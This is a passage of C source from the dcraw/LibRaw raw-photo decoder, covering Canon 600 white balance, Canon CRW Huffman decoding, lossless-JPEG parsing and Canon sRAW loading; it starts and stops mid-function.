for (i = len-1; i > 0; i--) {
b[i] = (y[i] - y[i-1]) / (x[i] - x[i-1]);
d[i-1] = x[i] - x[i-1];
}
for (i = 1; i < len-1; i++) {
A[i][i] = 2 * (d[i-1] + d[i]);
if (i > 1) {
A[i][i-1] = d[i-1];
A[i-1][i] = d[i-1];
}
A[i][len-1] = 6 * (b[i+1] - b[i]);
}
for(i = 1; i < len-2; i++) {
float v = A[i+1][i] / A[i][i];
for(j = 1; j <= len-1; j++)
A[i+1][j] -= v * A[i][j];
}
for(i = len-2; i > 0; i--) {
float acc = 0;
for(j = i; j <= len-2; j++)
acc += A[i][j]*c[j];
c[i] = (A[i][len-1] - acc) / A[i][i];
}
for (i = 0; i < 0x10000; i++) {
float x_out = (float)(i / 65535.0);
float y_out = 0;
for (j = 0; j < len-1; j++) {
if (x[j] <= x_out && x_out <= x[j+1]) {
float v = x_out - x[j];
y_out = y[j] +
((y[j+1] - y[j]) / d[j] - (2 * d[j] * c[j] + c[j+1] * d[j])/6) * v
+ (c[j] * 0.5) * v*v + ((c[j+1] - c[j]) / (6 * d[j])) * v*v*v;
}
}
curve[i] = y_out < 0.0 ? 0 : (y_out >= 1.0 ? 65535 :
(ushort)(y_out * 65535.0 + 0.5));
}
free (A);
}
void CLASS canon_600_fixed_wb (int temp)
{
static const short mul[4][5] = {
{ 667, 358,397,565,452 },
{ 731, 390,367,499,517 },
{ 1119, 396,348,448,537 },
{ 1399, 485,431,508,688 } };
int lo, hi, i;
float frac=0;
for (lo=4; --lo; )
if (*mul[lo] <= temp) break;
for (hi=0; hi < 3; hi++)
if (*mul[hi] >= temp) break;
if (lo != hi)
frac = (float) (temp - *mul[lo]) / (*mul[hi] - *mul[lo]);
for (i=1; i < 5; i++)
pre_mul[i-1] = 1 / (frac * mul[hi][i] + (1-frac) * mul[lo][i]);
}
/* Return values: 0 = white 1 = near white 2 = not white */
int CLASS canon_600_color (int ratio[2], int mar)
{
int clipped=0, target, miss;
if (flash_used) {
if (ratio[1] < -104)
{ ratio[1] = -104; clipped = 1; }
if (ratio[1] > 12)
{ ratio[1] = 12; clipped = 1; }
} else {
if (ratio[1] < -264 || ratio[1] > 461) return 2;
if (ratio[1] < -50)
{ ratio[1] = -50; clipped = 1; }
if (ratio[1] > 307)
{ ratio[1] = 307; clipped = 1; }
}
target = flash_used || ratio[1] < 197
? -38 - (398 * ratio[1] >> 10)
: -123 + (48 * ratio[1] >> 10);
if (target - mar <= ratio[0] &&
target + 20 >= ratio[0] && !clipped) return 0;
miss = target - ratio[0];
if (abs(miss) >= mar*4) return 2;
if (miss < -20) miss = -20;
if (miss > mar) miss = mar;
ratio[0] = target - miss;
return 1;
}
void CLASS canon_600_auto_wb()
{
int mar, row, col, i, j, st, count[] = { 0,0 };
int test[8], total[2][8], ratio[2][2], stat[2];
memset (&total, 0, sizeof total);
i = canon_ev + 0.5;
if (i < 10) mar = 150;
else if (i > 12) mar = 20;
else mar = 280 - 20 * i;
if (flash_used) mar = 80;
for (row=14; row < height-14; row+=4)
for (col=10; col < width; col+=2) {
for (i=0; i < 8; i++)
test[(i & 4) + FC(row+(i >> 1),col+(i & 1))] =
BAYER(row+(i >> 1),col+(i & 1));
for (i=0; i < 8; i++)
if (test[i] < 150 || test[i] > 1500) goto next;
for (i=0; i < 4; i++)
if (abs(test[i] - test[i+4]) > 50) goto next;
for (i=0; i < 2; i++) {
for (j=0; j < 4; j+=2)
ratio[i][j >> 1] = ((test[i*4+j+1]-test[i*4+j]) << 10) / test[i*4+j];
stat[i] = canon_600_color (ratio[i], mar);
}
if ((st = stat[0] | stat[1]) > 1) goto next;
for (i=0; i < 2; i++)
if (stat[i])
for (j=0; j < 2; j++)
test[i*4+j*2+1] = test[i*4+j*2] * (0x400 + ratio[i][j]) >> 10;
for (i=0; i < 8; i++)
total[st][i] += test[i];
count[st]++;
next: ;
}
if (count[0] | count[1]) {
st = count[0]*200 < count[1];
for (i=0; i < 4; i++)
pre_mul[i] = 1.0 / (total[st][i] + total[st][i+4]);
}
}
void CLASS canon_600_coeff()
{
static const short table[6][12] = {
{ -190,702,-1878,2390, 1861,-1349,905,-393, -432,944,2617,-2105 },
{ -1203,1715,-1136,1648, 1388,-876,267,245, -1641,2153,3921,-3409 },
{ -615,1127,-1563,2075, 1437,-925,509,3, -756,1268,2519,-2007 },
{ -190,702,-1886,2398, 2153,-1641,763,-251, -452,964,3040,-2528 },
{ -190,702,-1878,2390, 1861,-1349,905,-393, -432,944,2617,-2105 },
{ -807,1319,-1785,2297, 1388,-876,769,-257, -230,742,2067,-1555 } };
int t=0, i, c;
float mc, yc;
mc = pre_mul[1] / pre_mul[2];
yc = pre_mul[3] / pre_mul[2];
if (mc > 1 && mc <= 1.28 && yc < 0.8789) t=1;
if (mc > 1.28 && mc <= 2) {
if (yc < 0.8789) t=3;
else if (yc <= 2) t=4;
}
if (flash_used) t=5;
for (raw_color = i=0; i < 3; i++)
FORCC rgb_cam[i][c] = table[t][i*4 + c] / 1024.0;
}
void CLASS canon_600_load_raw()
{
uchar data[1120], *dp;
ushort *pix;
int irow, row;
for (irow=row=0; irow < height; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (data, 1, 1120, ifp) < 1120) derror();
pix = raw_image + row*raw_width;
for (dp=data; dp < data+1120; dp+=10, pix+=8) {
pix[0] = (dp[0] << 2) + (dp[1] >> 6 );
pix[1] = (dp[2] << 2) + (dp[1] >> 4 & 3);
pix[2] = (dp[3] << 2) + (dp[1] >> 2 & 3);
pix[3] = (dp[4] << 2) + (dp[1] & 3);
pix[4] = (dp[5] << 2) + (dp[9] & 3);
pix[5] = (dp[6] << 2) + (dp[9] >> 2 & 3);
pix[6] = (dp[7] << 2) + (dp[9] >> 4 & 3);
pix[7] = (dp[8] << 2) + (dp[9] >> 6 );
}
if ((row+=2) > height) row = 1;
}
}
void CLASS canon_600_correct()
{
int row, col, val;
static const short mul[4][2] =
{ { 1141,1145 }, { 1128,1109 }, { 1178,1149 }, { 1128,1109 } };
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++) {
if ((val = BAYER(row,col) - black) < 0) val = 0;
val = val * mul[row & 3][col & 1] >> 9;
BAYER(row,col) = val;
}
}
canon_600_fixed_wb(1311);
canon_600_auto_wb();
canon_600_coeff();
maximum = (0x3ff - black) * 1109 >> 9;
black = 0;
}
int CLASS canon_s2is()
{
unsigned row;
for (row=0; row < 100; row++) {
fseek (ifp, row*3340 + 3284, SEEK_SET);
if (getc(ifp) > 15) return 1;
}
return 0;
}
unsigned CLASS getbithuff (int nbits, ushort *huff)
{
#ifdef LIBRAW_NOTHREADS
static unsigned bitbuf=0;
static int vbits=0, reset=0;
#else
#define bitbuf tls->getbits.bitbuf
#define vbits tls->getbits.vbits
#define reset tls->getbits.reset
#endif
unsigned c;
if (nbits > 25) return 0;
if (nbits < 0)
return bitbuf = vbits = reset = 0;
if (nbits == 0 || vbits < 0) return 0;
while (!reset && vbits < nbits && (c = fgetc(ifp)) != EOF &&
!(reset = zero_after_ff && c == 0xff && fgetc(ifp))) {
bitbuf = (bitbuf << 8) + (uchar) c;
vbits += 8;
}
c = bitbuf << (32-vbits) >> (32-nbits);
if (huff) {
vbits -= huff[c] >> 8;
c = (uchar) huff[c];
} else
vbits -= nbits;
if (vbits < 0) derror();
return c;
#ifndef LIBRAW_NOTHREADS
#undef bitbuf
#undef vbits
#undef reset
#endif
}
#define getbits(n) getbithuff(n,0)
#define gethuff(h) getbithuff(*h,h+1)
/*
Construct a decode tree according to the specification in *source.
The first 16 bytes specify how many codes should be 1-bit, 2-bit,
3-bit, etc. Bytes after that are the leaf values.
For example, if the source is
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0,
0x04,0x03,0x05,0x06,0x02,0x07,0x01,0x08,0x09,0x00,0x0a,0x0b,0xff },
then the code is
00 0x04
010 0x03
011 0x05
100 0x06
101 0x02
1100 0x07
1101 0x01
11100 0x08
11101 0x09
11110 0x00
111110 0x0a
1111110 0x0b
1111111 0xff
*/
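/*
   How the flat table is used (added for illustration): make_decoder_ref()
   stores the longest code length in huff[0] (7 for the example above) and,
   for each code of length len, fills 2^(7-len) consecutive slots with the
   value (len << 8 | leaf). gethuff() then peeks 7 bits ahead and performs a
   single lookup: any 7-bit window beginning with the bits 010 lands on an
   entry holding 0x0303, i.e. code length 3 and leaf value 0x03, so only
   3 bits are consumed from the stream.
 */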
ushort * CLASS make_decoder_ref (const uchar **source)
{
int max, len, h, i, j;
const uchar *count;
ushort *huff;
count = (*source += 16) - 17;
for (max=16; max && !count[max]; max--);
huff = (ushort *) calloc (1 + (1 << max), sizeof *huff);
merror (huff, "make_decoder()");
huff[0] = max;
for (h=len=1; len <= max; len++)
for (i=0; i < count[len]; i++, ++*source)
for (j=0; j < 1 << (max-len); j++)
if (h <= 1 << max)
huff[h++] = len << 8 | **source;
return huff;
}
ushort * CLASS make_decoder (const uchar *source)
{
return make_decoder_ref (&source);
}
void CLASS crw_init_tables (unsigned table, ushort *huff[2])
{
static const uchar first_tree[3][29] = {
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0,
0x04,0x03,0x05,0x06,0x02,0x07,0x01,0x08,0x09,0x00,0x0a,0x0b,0xff },
{ 0,2,2,3,1,1,1,1,2,0,0,0,0,0,0,0,
0x03,0x02,0x04,0x01,0x05,0x00,0x06,0x07,0x09,0x08,0x0a,0x0b,0xff },
{ 0,0,6,3,1,1,2,0,0,0,0,0,0,0,0,0,
0x06,0x05,0x07,0x04,0x08,0x03,0x09,0x02,0x00,0x0a,0x01,0x0b,0xff },
};
static const uchar second_tree[3][180] = {
{ 0,2,2,2,1,4,2,1,2,5,1,1,0,0,0,139,
0x03,0x04,0x02,0x05,0x01,0x06,0x07,0x08,
0x12,0x13,0x11,0x14,0x09,0x15,0x22,0x00,0x21,0x16,0x0a,0xf0,
0x23,0x17,0x24,0x31,0x32,0x18,0x19,0x33,0x25,0x41,0x34,0x42,
0x35,0x51,0x36,0x37,0x38,0x29,0x79,0x26,0x1a,0x39,0x56,0x57,
0x28,0x27,0x52,0x55,0x58,0x43,0x76,0x59,0x77,0x54,0x61,0xf9,
0x71,0x78,0x75,0x96,0x97,0x49,0xb7,0x53,0xd7,0x74,0xb6,0x98,
0x47,0x48,0x95,0x69,0x99,0x91,0xfa,0xb8,0x68,0xb5,0xb9,0xd6,
0xf7,0xd8,0x67,0x46,0x45,0x94,0x89,0xf8,0x81,0xd5,0xf6,0xb4,
0x88,0xb1,0x2a,0x44,0x72,0xd9,0x87,0x66,0xd4,0xf5,0x3a,0xa7,
0x73,0xa9,0xa8,0x86,0x62,0xc7,0x65,0xc8,0xc9,0xa1,0xf4,0xd1,
0xe9,0x5a,0x92,0x85,0xa6,0xe7,0x93,0xe8,0xc1,0xc6,0x7a,0x64,
0xe1,0x4a,0x6a,0xe6,0xb3,0xf1,0xd3,0xa5,0x8a,0xb2,0x9a,0xba,
0x84,0xa4,0x63,0xe5,0xc5,0xf3,0xd2,0xc4,0x82,0xaa,0xda,0xe4,
0xf2,0xca,0x83,0xa3,0xa2,0xc3,0xea,0xc2,0xe2,0xe3,0xff,0xff },
{ 0,2,2,1,4,1,4,1,3,3,1,0,0,0,0,140,
0x02,0x03,0x01,0x04,0x05,0x12,0x11,0x06,
0x13,0x07,0x08,0x14,0x22,0x09,0x21,0x00,0x23,0x15,0x31,0x32,
0x0a,0x16,0xf0,0x24,0x33,0x41,0x42,0x19,0x17,0x25,0x18,0x51,
0x34,0x43,0x52,0x29,0x35,0x61,0x39,0x71,0x62,0x36,0x53,0x26,
0x38,0x1a,0x37,0x81,0x27,0x91,0x79,0x55,0x45,0x28,0x72,0x59,
0xa1,0xb1,0x44,0x69,0x54,0x58,0xd1,0xfa,0x57,0xe1,0xf1,0xb9,
0x49,0x47,0x63,0x6a,0xf9,0x56,0x46,0xa8,0x2a,0x4a,0x78,0x99,
0x3a,0x75,0x74,0x86,0x65,0xc1,0x76,0xb6,0x96,0xd6,0x89,0x85,
0xc9,0xf5,0x95,0xb4,0xc7,0xf7,0x8a,0x97,0xb8,0x73,0xb7,0xd8,
0xd9,0x87,0xa7,0x7a,0x48,0x82,0x84,0xea,0xf4,0xa6,0xc5,0x5a,
0x94,0xa4,0xc6,0x92,0xc3,0x68,0xb5,0xc8,0xe4,0xe5,0xe6,0xe9,
0xa2,0xa3,0xe3,0xc2,0x66,0x67,0x93,0xaa,0xd4,0xd5,0xe7,0xf8,
0x88,0x9a,0xd7,0x77,0xc4,0x64,0xe2,0x98,0xa5,0xca,0xda,0xe8,
0xf3,0xf6,0xa9,0xb2,0xb3,0xf2,0xd2,0x83,0xba,0xd3,0xff,0xff },
{ 0,0,6,2,1,3,3,2,5,1,2,2,8,10,0,117,
0x04,0x05,0x03,0x06,0x02,0x07,0x01,0x08,
0x09,0x12,0x13,0x14,0x11,0x15,0x0a,0x16,0x17,0xf0,0x00,0x22,
0x21,0x18,0x23,0x19,0x24,0x32,0x31,0x25,0x33,0x38,0x37,0x34,
0x35,0x36,0x39,0x79,0x57,0x58,0x59,0x28,0x56,0x78,0x27,0x41,
0x29,0x77,0x26,0x42,0x76,0x99,0x1a,0x55,0x98,0x97,0xf9,0x48,
0x54,0x96,0x89,0x47,0xb7,0x49,0xfa,0x75,0x68,0xb6,0x67,0x69,
0xb9,0xb8,0xd8,0x52,0xd7,0x88,0xb5,0x74,0x51,0x46,0xd9,0xf8,
0x3a,0xd6,0x87,0x45,0x7a,0x95,0xd5,0xf6,0x86,0xb4,0xa9,0x94,
0x53,0x2a,0xa8,0x43,0xf5,0xf7,0xd4,0x66,0xa7,0x5a,0x44,0x8a,
0xc9,0xe8,0xc8,0xe7,0x9a,0x6a,0x73,0x4a,0x61,0xc7,0xf4,0xc6,
0x65,0xe9,0x72,0xe6,0x71,0x91,0x93,0xa6,0xda,0x92,0x85,0x62,
0xf3,0xc5,0xb2,0xa4,0x84,0xba,0x64,0xa5,0xb3,0xd2,0x81,0xe5,
0xd3,0xaa,0xc4,0xca,0xf2,0xb1,0xe4,0xd1,0x83,0x63,0xea,0xc3,
0xe2,0x82,0xf1,0xa3,0xc2,0xa1,0xc1,0xe3,0xa2,0xe1,0xff,0xff }
};
if (table > 2) table = 2;
huff[0] = make_decoder ( first_tree[table]);
huff[1] = make_decoder (second_tree[table]);
}
/*
Return 0 if the image starts with compressed data,
1 if it starts with uncompressed low-order bits.
In Canon compressed data, 0xff is always followed by 0x00.
*/
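/* Illustrative consequence of the rule above: scanning the first 16 KiB
   (starting at byte 540), a 0xff byte followed by 0x00 is consistent with
   compressed data, while a 0xff followed by any non-zero byte means the
   file begins with the uncompressed low-order bits. */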
int CLASS canon_has_lowbits()
{
uchar test[0x4000];
int ret=1, i;
fseek (ifp, 0, SEEK_SET);
fread (test, 1, sizeof test, ifp);
for (i=540; i < sizeof test - 1; i++)
if (test[i] == 0xff) {
if (test[i+1]) return 1;
ret=0;
}
return ret;
}
void CLASS canon_load_raw()
{
ushort *pixel, *prow, *huff[2];
int nblocks, lowbits, i, c, row, r, save, val;
int block, diffbuf[64], leaf, len, diff, carry=0, pnum=0, base[2];
crw_init_tables (tiff_compress, huff);
lowbits = canon_has_lowbits();
if (!lowbits) maximum = 0x3ff;
fseek (ifp, 540 + lowbits*raw_height*raw_width/4, SEEK_SET);
zero_after_ff = 1;
getbits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row+=8) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pixel = raw_image + row*raw_width;
nblocks = MIN (8, raw_height-row) * raw_width >> 6;
for (block=0; block < nblocks; block++) {
memset (diffbuf, 0, sizeof diffbuf);
for (i=0; i < 64; i++ ) {
leaf = gethuff(huff[i > 0]);
if (leaf == 0 && i) break;
if (leaf == 0xff) continue;
i += leaf >> 4;
len = leaf & 15;
if (len == 0) continue;
diff = getbits(len);
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
if (i < 64) diffbuf[i] = diff;
}
diffbuf[0] += carry;
carry = diffbuf[0];
for (i=0; i < 64; i++ ) {
if (pnum++ % raw_width == 0)
base[0] = base[1] = 512;
if ((pixel[(block << 6) + i] = base[i & 1] += diffbuf[i]) >> 10)
derror();
}
}
if (lowbits) {
save = ftell(ifp);
fseek (ifp, 26 + row*raw_width/4, SEEK_SET);
for (prow=pixel, i=0; i < raw_width*2; i++) {
c = fgetc(ifp);
for (r=0; r < 8; r+=2, prow++) {
val = (*prow << 2) + ((c >> r) & 3);
if (raw_width == 2672 && val < 512) val += 2;
*prow = val;
}
}
fseek (ifp, save, SEEK_SET);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
FORC(2) free (huff[c]);
throw;
}
#endif
FORC(2) free (huff[c]);
}
//@end COMMON
struct jhead {
int algo, bits, high, wide, clrs, sraw, psv, restart, vpred[6];
ushort quant[64], idct[64], *huff[20], *free[20], *row;
};
//@out COMMON
int CLASS ljpeg_start (struct jhead *jh, int info_only)
{
ushort c, tag, len;
int cnt = 0;
uchar data[0x10000];
const uchar *dp;
memset (jh, 0, sizeof *jh);
jh->restart = INT_MAX;
if ((fgetc(ifp),fgetc(ifp)) != 0xd8) return 0;
do {
if(feof(ifp)) return 0;
if(cnt++ > 1024) return 0; // 1024 tags limit
if (!fread (data, 2, 2, ifp)) return 0;
tag = data[0] << 8 | data[1];
len = (data[2] << 8 | data[3]) - 2;
if (tag <= 0xff00) return 0;
fread (data, 1, len, ifp);
switch (tag) {
case 0xffc3: // start of frame; lossless, Huffman
jh->sraw = ((data[7] >> 4) * (data[7] & 15) - 1) & 3;
case 0xffc1:
case 0xffc0:
jh->algo = tag & 0xff;
jh->bits = data[0];
jh->high = data[1] << 8 | data[2];
jh->wide = data[3] << 8 | data[4];
jh->clrs = data[5] + jh->sraw;
if (len == 9 && !dng_version) getc(ifp);
break;
case 0xffc4: // define Huffman tables
if (info_only) break;
for (dp = data; dp < data+len && !((c = *dp++) & -20); )
jh->free[c] = jh->huff[c] = make_decoder_ref (&dp);
break;
case 0xffda: // start of scan
jh->psv = data[1+data[0]*2];
jh->bits -= data[3+data[0]*2] & 15;
break;
case 0xffdb:
FORC(64) jh->quant[c] = data[c*2+1] << 8 | data[c*2+2];
break;
case 0xffdd:
jh->restart = data[0] << 8 | data[1];
}
} while (tag != 0xffda);
if (jh->bits > 16 || jh->clrs > 6 ||
!jh->bits || !jh->high || !jh->wide || !jh->clrs) return 0;
if (info_only) return 1;
if (!jh->huff[0]) return 0;
FORC(19) if (!jh->huff[c+1]) jh->huff[c+1] = jh->huff[c];
if (jh->sraw) {
FORC(4) jh->huff[2+c] = jh->huff[1];
FORC(jh->sraw) jh->huff[1+c] = jh->huff[0];
}
jh->row = (ushort *) calloc (jh->wide*jh->clrs, 4);
merror (jh->row, "ljpeg_start()");
return zero_after_ff = 1;
}
void CLASS ljpeg_end (struct jhead *jh)
{
int c;
FORC4 if (jh->free[c]) free (jh->free[c]);
free (jh->row);
}
int CLASS ljpeg_diff (ushort *huff)
{
int len, diff;
if(!huff)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 2);
#endif
len = gethuff(huff);
if (len == 16 && (!dng_version || dng_version >= 0x1010000))
return -32768;
diff = getbits(len);
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
return diff;
}
ushort * CLASS ljpeg_row (int jrow, struct jhead *jh)
{
int col, c, diff, pred, spred=0;
ushort mark=0, *row[3];
if (jrow * jh->wide % jh->restart == 0) {
FORC(6) jh->vpred[c] = 1 << (jh->bits-1);
if (jrow) {
fseek (ifp, -2, SEEK_CUR);
do mark = (mark << 8) + (c = fgetc(ifp));
while (c != EOF && mark >> 4 != 0xffd);
}
getbits(-1);
}
FORC3 row[c] = jh->row + jh->wide*jh->clrs*((jrow+c) & 1);
for (col=0; col < jh->wide; col++)
FORC(jh->clrs) {
diff = ljpeg_diff (jh->huff[c]);
if (jh->sraw && c <= jh->sraw && (col | c))
pred = spred;
else if (col) pred = row[0][-jh->clrs];
else pred = (jh->vpred[c] += diff) - diff;
if (jrow && col) switch (jh->psv) {
case 1: break;
case 2: pred = row[1][0]; break;
case 3: pred = row[1][-jh->clrs]; break;
case 4: pred = pred + row[1][0] - row[1][-jh->clrs]; break;
case 5: pred = pred + ((row[1][0] - row[1][-jh->clrs]) >> 1); break;
case 6: pred = row[1][0] + ((pred - row[1][-jh->clrs]) >> 1); break;
case 7: pred = (pred + row[1][0]) >> 1; break;
default: pred = 0;
}
if ((**row = pred + diff) >> jh->bits) derror();
if (c <= jh->sraw) spred = **row;
row[0]++; row[1]++;
}
return row[2];
}
void CLASS lossless_jpeg_load_raw()
{
int jwide, jhigh, jrow, jcol, val, jidx, i, j, row=0, col=0;
struct jhead jh;
ushort *rp;
if (!ljpeg_start (&jh, 0)) return;
if(jh.wide<1 || jh.high<1 || jh.clrs<1 || jh.bits <1)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 2);
#endif
jwide = jh.wide * jh.clrs;
jhigh = jh.high;
if(jh.clrs == 4 && jwide >= raw_width*2) jhigh *= 2;
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (jrow=0; jrow < jh.high; jrow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
rp = ljpeg_row (jrow, &jh);
if (load_flags & 1)
row = jrow & 1 ? height-1-jrow/2 : jrow/2;
for (jcol=0; jcol < jwide; jcol++) {
val = curve[*rp++];
if (cr2_slice[0]) {
jidx = jrow*jwide + jcol;
i = jidx / (cr2_slice[1]*raw_height);
if ((j = i >= cr2_slice[0]))
i = cr2_slice[0];
jidx -= i * (cr2_slice[1]*raw_height);
row = jidx / cr2_slice[1+j];
col = jidx % cr2_slice[1+j] + i*cr2_slice[1];
}
if (raw_width == 3984 && (col -= 2) < 0)
col += (row--,raw_width);
if(row>raw_height)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 3);
#endif
if ((unsigned) row < raw_height) RAW(row,col) = val;
if (++col >= raw_width)
col = (row++,0);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw;
}
#endif
ljpeg_end (&jh);
}
void CLASS canon_sraw_load_raw()
{
struct jhead jh;
short *rp=0, (*ip)[4];
int jwide, slice, scol, ecol, row, col, jrow=0, jcol=0, pix[3], c;
int v[3]={0,0,0}, ver, hue;
#ifdef LIBRAW_LIBRARY_BUILD
int saved_w = width, saved_h = height;
#endif
char *cp;
if (!ljpeg_start (&jh, 0) || jh.clrs < 4) return;
jwide = (jh.wide >>= 1) * jh.clrs;
#ifdef LIBRAW_LIBRARY_BUILD
if(load_flags & 256)
{
width = raw_width;
height = raw_height;
}
try {
#endif
for (ecol=slice=0; slice <= cr2_slice[0]; slice++) {
scol = ecol;
ecol += cr2_slice[1] * 2 / jh.clrs;
if (!cr2_slice[0] || ecol > raw_width-1) ecol = raw_width & -2;
for (row=0; row < height; row += (jh.clrs >> 1) - 1) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
ip = (short (*)[4]) image + row*width;
for (col=scol; col < ecol; col+=2, jcol+=jh.clrs) {
if ((jcol %= jwide) == 0)
rp = (short *) ljpeg_row (jrow++, &jh);
if (col >= width) continue;
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_INTERPOLATE)
{
FORC (jh.clrs-2)
{
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col + (c >> 1)*width + (c & 1)][1] = ip[col + (c >> 1)*width + (c & 1)][2] = 8192;
}
ip[col][1] = rp[jcol+jh.clrs-2] - 8192;
ip[col][2] = rp[jcol+jh.clrs-1] - 8192;
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_RGB)
{
FORC (jh.clrs-2)
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col][1] = rp[jcol+jh.clrs-2] - 8192;
ip[col][2] = rp[jcol+jh.clrs-1] - 8192;
}
else
#endif
{
FORC (jh.clrs-2)
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col][1] = rp[jcol+jh.clrs-2] - 16384;
ip[col][2] = rp[jcol+jh.clrs-1] - 16384;
}
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_INTERPOLATE)
{
ljpeg_end (&jh);
maximum = 0x3fff;
height = saved_h;
width = saved_w;
return;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (cp=model2; *cp && !isdigit(*cp); cp++);
sscanf (cp, "%d.%d.%d", v, v+1, v+2);
ver = (v[0]*1000 + v[1])*1000 + v[2];
hue = (jh.sraw+1) << 2;
if (unique_id >= 0x80000281 || (unique_id == 0x80000218 && ver > 1000006))
hue = jh.sraw << 1;
ip = (short (*)[4]) image;
rp = ip[0];
for (row=0; row < height; row++, ip+=width) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (row & (jh.sraw >> 1))
{
for (col=0; col < width; col+=2)
for (c=1; c < 3; c++)
if (row == height-1)
{
ip[col][c] = ip[col-width][c];
}
else
{
ip[col][c] = (ip[col-width][c] + ip[col+width][c] + 1) >> 1;
}
}
for (col=1; col < width; col+=2)
for (c=1; c < 3; c++)
if (col == width-1)
ip[col][c] = ip[col-1][c];
else ip[col][c] = (ip[col-1][c] + ip[col+1][c] + 1) >> 1;
}
#ifdef LIBRAW_LIBRARY_BUILD
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_RGB) )
#endif
for ( ; rp < ip[0]; rp+=4) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (unique_id == 0x80000218 ||
unique_id == 0x80000250 ||
unique_id == 0x80000261 ||
unique_id == 0x80000281 ||
unique_id == 0x80000287) {
rp[1] = (rp[1] << 2) + hue;
rp[2] = (rp[2] << 2) + hue;
pix[0] = rp[0] + (( 50*rp[1] + 22929*rp[2]) >> 14);
pix[1] = rp[0] + ((-5640*rp[1] - 11751*rp[2]) >> 14);
pix[2] = rp[0] + ((29040*rp[1] - 101*rp[2]) >> 14);
} else {
if (unique_id < 0x80000218) rp[0] -= 512;
pix[0] = rp[0] + rp[2];
pix[2] = rp[0] + rp[1];
pix[1] = rp[0] + ((-778*rp[1] - (rp[2] << 11)) >> 12);
}
FORC3 rp[c] = CLIP(pix[c] * sraw_mul[c] >> 10);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
height = saved_h;
width = saved_w;
#endif
ljpeg_end (&jh);
maximum = 0x3fff;
}
void CLASS adobe_copy_pixel (unsigned row, unsigned col, ushort **rp)
{
int c;
if (tiff_samples == 2 && shot_select) (*rp)++;
if (raw_image) {
if (row < raw_height && col < raw_width)
RAW(row,col) = curve[**rp];
*rp += tiff_samples;
} else {
if (row < height && col < width)
FORC(tiff_samples)
image[row*width+col][c] = curve[(*rp)[c]];
*rp += tiff_samples;
}
if (tiff_samples == 2 && shot_select) (*rp)--;
}
void CLASS ljpeg_idct (struct jhead *jh)
{
int c, i, j, len, skip, coef;
float work[3][8][8];
static float cs[106] = { 0 };
static const uchar zigzag[80] =
{ 0, 1, 8,16, 9, 2, 3,10,17,24,32,25,18,11, 4, 5,12,19,26,33,
40,48,41,34,27,20,13, 6, 7,14,21,28,35,42,49,56,57,50,43,36,
29,22,15,23,30,37,44,51,58,59,52,45,38,31,39,46,53,60,61,54,
47,55,62,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63 };
if (!cs[0])
FORC(106) cs[c] = cos((c & 31)*M_PI/16)/2;
memset (work, 0, sizeof work);
work[0][0][0] = jh->vpred[0] += ljpeg_diff (jh->huff[0]) * jh->quant[0];
for (i=1; i < 64; i++ ) {
len = gethuff (jh->huff[16]);
i += skip = len >> 4;
if (!(len &= 15) && skip < 15) break;
coef = getbits(len);
if ((coef & (1 << (len-1))) == 0)
coef -= (1 << len) - 1;
((float *)work)[zigzag[i]] = coef * jh->quant[i];
}
FORC(8) work[0][0][c] *= M_SQRT1_2;
FORC(8) work[0][c][0] *= M_SQRT1_2;
for (i=0; i < 8; i++)
for (j=0; j < 8; j++)
FORC(8) work[1][i][j] += work[0][i][c] * cs[(j*2+1)*c];
for (i=0; i < 8; i++)
for (j=0; j < 8; j++)
FORC(8) work[2][i][j] += work[1][c][j] * cs[(i*2+1)*c];
FORC(64) jh->idct[c] = CLIP(((float *)work[2])[c]+0.5);
}
void CLASS lossless_dng_load_raw()
{
unsigned save, trow=0, tcol=0, jwide, jrow, jcol, row, col, i, j;
struct jhead jh;
ushort *rp;
while (trow < raw_height) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
save = ftell(ifp);
if (tile_length < INT_MAX)
fseek (ifp, get4(), SEEK_SET);
if (!ljpeg_start (&jh, 0)) break;
jwide = jh.wide;
if (filters) jwide *= jh.clrs;
jwide /= MIN (is_raw, tiff_samples);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
switch (jh.algo) {
case 0xc1:
jh.vpred[0] = 16384;
